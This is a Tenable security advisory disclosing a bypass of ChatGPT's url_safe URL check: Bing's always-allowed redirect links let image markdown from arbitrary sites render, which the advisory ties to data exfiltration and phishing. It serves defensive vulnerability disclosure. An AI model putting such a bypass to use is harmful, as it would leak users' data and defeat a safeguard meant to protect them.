Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

OpenAI ChatGPT url_safe Mechanism Bypass

Medium

Synopsis

Tenable Researchers discovered a method by which the url_safe defense mechanism can be bypassed. An attacker could exploit this bypass to affect the loading of malicious resources used for phishing or a variety of other purposes. At the time this advisory was published, this issue remains unresolved.

ChatGPT aims to protect its users by verifying URLs and checking for potentially malicious content. This mechanism is called url_safe. In case of a reference to a URL through an image markdown or a hyperlink, ChatGPT verifies that this website is trustworthy and reliable. Only if that’s the case - it then processes it and acts. This functionality protects the engine and users from uncontrolled/unsafe URLs. However, we managed to bypass this core defense mechanism and access any website we wanted, regardless of its maliciousness.

Bypassing the url_safe defense mechanism

Rendering images is usually the best technique for exfiltrating data. We noticed OpenAI tried to block rendering images from unsafe URLs with the url_safe defense mechanism, but we managed to bypass it.

The url_safe function runs when it recognizes a URL in the chat, either through image markdown, hyperlink or other types of links in the chat. It simply sends the URL to ChatGPT’s backend, and returns if the URL is safe or not.

We noticed that URLs from bing.com are always allowed, and we managed to abuse it by using our indexed sites on Bing. Indexed sites on Bing are served through a wrapped link that redirects the user from a bing.com link to the user’s websites - essentially an open redirect as a service.

With our bing.com links, we could bypass the url_safe defense mechanism, which then returned true and our image markdowns rendered successfully.

Additional Research

Tenable would like to acknowledge similar url_safe bypass research published during the disclosure window: https://embracethered.com/blog/posts/2025/spaiware-and-chatgpt-command-and-control-via-prompt-injection-zombai/

Tenable researchers became aware of this publication, and the referenced talk which was delivered at Blackhat Europe 2024, after the initial report of the discovery had been made to OpenAI, but prior to the public disclosure of the associated discovery.
 

Solution

A solution has yet to be deployed.

Disclosure Timeline

December 10, 2024 - Tenable requests security contact via [email protected].
December 10, 2024 - OpenAI ask Tenable to share the vulnerability report via same email thread
December 10, 2024 - Tenable shared the full vulnerability report via same email thread
December 10, 2024 - OpenAI acknowledge receiving the report and will get back to us with updates
December 17, 2024 - Tenable asks for an update regarding this issue
January 3, 2025 - OpenAI adds another person to the conversation
January 12, 2025 - Tenable asks for a status update
January 26, 2025 - Tenable asks for a status update
February 9, 2025 - Tenable asks for a status update
February 23, 2025 - Tenable asks for a status update
March 4, 2025 - Tenable asks for a status update

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2025-06
Credit:
Moshe Bernstein
Liv Matan
Yarden Curiel
Affected Products:
OpenAI ChatGPT
Risk Factor:
Medium

Advisory Timeline

March 10, 2025 - Initial release.